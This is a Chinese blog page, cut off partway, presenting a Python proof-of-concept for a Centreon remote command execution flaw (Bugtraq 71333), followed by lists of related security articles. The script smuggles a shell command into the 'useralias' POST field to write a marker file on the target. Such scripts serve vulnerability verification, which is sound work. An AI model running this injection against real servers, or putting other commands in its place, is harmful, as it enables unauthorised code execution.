Bugtraq ID:71333 PoC

最新推荐文章于 2023-11-09 18:45:46 发布
最新推荐文章于 2023-11-09 18:45:46 发布
阅读量1.5k 收藏
点赞数
分类专栏: 信息安全 文章标签: Centreon 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leng_que/article/details/41829613
版权
这是一个关于Centreon 'exec()'函数远程命令执行漏洞的Python poc。漏洞影响Centreon <= 2.5.3版本,触发条件是开启调试权限。 poc通过构造特定的POST数据,尝试利用漏洞写入文件验证漏洞存在。
摘要由CSDN通过智能技术生成 
#!/usr/bin/python
#coding: gb2312

# 文件名称:centreon_exec_rce_poc.py
# 编写时间:2014-12-09
# 更新时间:2015-07-17

# 漏洞说明:Centreon 'exec()' 函数远程命令执行漏洞
# 影响版本:Centreon <= 2.5.3
# 特别说明:该漏洞的触发条件是开启了调试权限。具体配置参考:系统管理 -> 参数 -> 调试 -> 认证debug -> Yes

# 漏洞参考:
# Bugtraq ID:71333
# http://www.securityfocus.com/bid/71333/

import sys
import urllib

flag = "leng_que"

# 备注:Centreon内部会把`号过滤掉,同时会把*号转换为\*
shell_cmd = "echo -n '"+flag+"' > leng_que.txt;"

def main(centreon_server_url):
    post_data = urllib.urlencode({"useralias": "\";"+shell_cmd+"\"", "password": "leng_que", "submit": "leng_que"})
    r = urllib.urlopen(centreon_server_url, post_data)
    if ( 200 == r.getcode() ):
        test_file_url = centreon_server_url+"/le
最低0.47元/天 解锁文章
leng_que
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞都是怎么编号的CVE/CAN/BUGTRAQ/CNCVE/CNVD/CNNVD
aletero的专栏
05-08 1万+
在一些文章和报道中经常提到安全漏洞CVE-1999-1046这种CVE开头的漏洞编号,这篇文章将常见的漏洞ID的表示方法做下介绍:   1、以CVE开头,如CVE-1999-1046这种      CVE 的英文全称是“Common Vulnerabilities & Exposures”公共漏洞和暴露。CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名
BugTraq Ids database
03-10
{"bugtraq_id": 21, "class": "Environment Error", "cve": ["CVE-1999-1123"], "local": "no", "remote": "no", "title": "SunOS /usr/release/bin/makeinstall Vulnerability", "vuln_products": ["Sun SunOS ...
BugTraq是什么?
冷却
09-22 3926
BugTraq是什么? BugTraq是一个完整的对计算机安全漏洞(它们是什么,如何利用它们,以及如何修补它们)的公告及详细论述进行适度披露的邮件列表。  ---------------------------------------------------以下是原文---------------------------------------------------  Wha
bugtraq linux 登陆_10款黑/客专用的Linux操作系统发行版
weixin_39969881的博客
12-22 277
1. Kali LinuxKali应该是最著名的用于***测试的Linux发行版,用于白帽***和***测试。Kali由OffensiveSecurity开发,最初由BackTrack开发。Kali是基于Debian的发行版。它自带有来自安全和取证各个领域的大量***测试工具。现在,它遵循滚动发布模型,可以使您集合中的每个工具将始终保持最新状态。它是目前最先进的***测试平台,可支持各种设备和硬件...
***测试、电子取证系统 – Bugtraq-I
weixin_33868027的博客
07-31 167
到这你可能发现没有什么特别的,但是在看过它的工具列表以后我发现这是一个有自己特色的系统。 首先是对无线和蓝牙有特别的支持:有着打了补丁的2.6.38内核和一大串的支持列表以及丰富的软件: Wireless adm8211 ath5k ath9h ar9170 b43 b43legacy iwl3945 iwlagn ipw2100 ipw2200 ...
bugtraq mysql_MySQL sql_parse.cc远程格式串漏洞
weixin_34773479的博客
01-26 204
BUGTRAQ ID: 35609MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。MySQL的sql_parse.cc文件中的dispatch_command()函数存在格式串错误:2084行:case COM_CREATE_DB: // QQ: To be removed{char *db=thd->strdup(packet...
PatataWifi:土豆网
06-23
在 Debian、Kali Linux、Kali Linux ARM (Raspberry Pi)、Raspbian (Raspberry Pi)、Pwnpi (Raspberry Pi)、Bugtraq 中测试。v2.1 已添加 Hostapd Mana 支持钓鱼服务已被钓鱼模块取代Karma 服务已被 karma 模块取代...
CVE-2006-3747:有关我在CVE-2006-3747上的咨询的信息(Apache mod_rewrite LDAP一次性缓存溢出)。当时,这是第一个公开工作的漏洞利用
05-05
Bugtraq ID:19204 CERT咨询:VU#395412 严重程度:高 CVSS v2基本得分:7.6高(AV:N / AC:H / Au:N / C:C / I:C / A:C) 介绍 2006年7月28日,Mark Dowd(McAfee Avert Labs)向bugtraq邮件列表报告了在...
Core Software Security: Security at the Source
02-01
CERT, Bugtraq, and SecurityFocus Critical Tools and Talent The Tools The Talent Principles of Least Privilege Privacy The Importance of Metrics Mapping the Security Development Lifecycle to the ...
TurtleHub:TortoiseGit问题跟踪器插件,用于托管在GitHub上的项目
05-15
有两种方法:本地集成和BugTraq集成。 有关选择哪种方法的信息以及有关集成方法和功能的详细信息,请参见 。 不过,以下是快速入门: 快速入门-集成 打开上下文菜单,然后转到TortoiseGit > Settings > Issue ...
POC and frame_num 详细解析,清晰易懂
11-15
POC and frame_num 详细解析,清晰易懂注意,H264码流的输出顺序是编码顺序,所以在编码B帧的时候,由于B是双向预测,需要先编码后面编码帧P/I,这时候先输出I/P,后面才有B帧,我们在解码段拿到相应的I/P帧后,不能马上丢到buffer list里面,还需要等待后面的B帧,解码B帧后再reorder.所以相应产生了两个参数。poc, frame_num,这两个元素在slice级输出
Svn与Bug系统集成:Bugtraq属性
lovec的专栏
04-02 507
       以下一些属性在 Subclipse 和 TortoiseSVN 设置成功  bugtraq:url ,指向Bug系统的URL,此URL中应该包含"%BUGID%",这样svn就会在提交的时候自动将那个字符串替换成相应的数字 bugtraq:warnifnoissue,"true/false",设置为true,那么在提交的时候,没有填问题(issue)输入框,系统...
bugtraq linux 登陆_|Linux Kernel多个安全漏洞 - 信息安全漏洞门户 VULHUB
weixin_35645077的博客
01-16 1441
BUGTRAQ ID: 15049 CVE(CAN) ID: CVE-2005-3053,CVE-2005-3106,CVE-2005-3107,CVE-2005-3108,CVE-2005-3109,CVE-2005-3110 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel中存在多个漏洞,具体如下: sys_set_mempolicy()函数中存在拒...
漏洞扫描(漏洞库&漏洞扫描器)
weixin_63082823的博客
09-21 1344
是一个自动化的Web应用程序安全测试工具,它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。— 其运作效能能随着系统的资源而自行调整。BugTraq漏洞库(http://www.securityfocus.com/bid)中国计算机网络应急处理协调中心 (http://www.cert.org.cn)ICAT漏洞库(http://icat.nist.gov/icat.cfm)CERT/CC漏洞信息数据库 ( http://www.cert.org )
小白学安全-漏洞编号的理解 CVE/CAN/BUGTRAQ/CNCVE/CNVD/CNNVD
最新发布
xqdd的专栏
11-09 2222
CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。假设在一个漏洞报告中指明的一个漏洞,假设有CVE名称,你就能够高速地在不论什么其他CVE兼容的数据库中找到对应修补的信息,解决安全问题。是中国信息安全测评中心为切实履行漏洞分析和风险评估的职能,负责建设运维的国家信息安全漏洞库,为我国信息安全保障提供基础服务。CNCVE就是中国(CN)的CVE,是CNCERT/CC(国家计算机网络应急处理协调中心)为漏洞进行编号的一个自己的标准,即国家计算机网络应急处理协调中心。
一些工具下载地址
Askeyes的专栏
11-01 989
<br />arm-none-linux-gcc:<br />http://www.codesourcery.com/downloads/public/gnu_toolchain/arm-none-linux-gnueabi<br /><br /><br />mingw:<br />http://sourceforge.net/projects/mingw/ ,下载后网络安装<br /><br /><br />adb: <br />http://nchc.dl.sourceforge.net/project
10大黑客专用的 Linux 操作系统,每个都很酷
weixin_45311714的博客
09-06 4728
10大黑客专用的 Linux 操作系统,每个都很酷。
盘点黑客的十大“玩具Linux”
u014389734的博客
06-10 255
1.Kali LinuxKali Linux属于开源项目,并由OffensiveSecurity公司负责维护与资助——这是一家世界级信息安全培训与渗透测试服务供应商。除了KaliLinux之外,OffensiveSecurity公司旗下还拥有ExploitDatabase以及免费在线课程MetasploitUnleashed。2.BackBoxBackBoxLinux由多位技术人员协作开发而成,且拥有一套由支持成员构成的中等规模社区体系。它拥有大量接入点,而团队中的每位成员都专注于一项特定任务。因此,该团队
深入理解C堆栈溢出:Smashing The Stack For Fun And Profit
"Smashing The Stack For Fun And Profit 是一篇经典的C语言栈溢出技术文章,由AlephOne撰写,发布在BugTraq、r00t和Underground.Org上。该文深入介绍了如何利用C语言程序中的栈溢出来执行恶意操作。栈溢出是由于在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值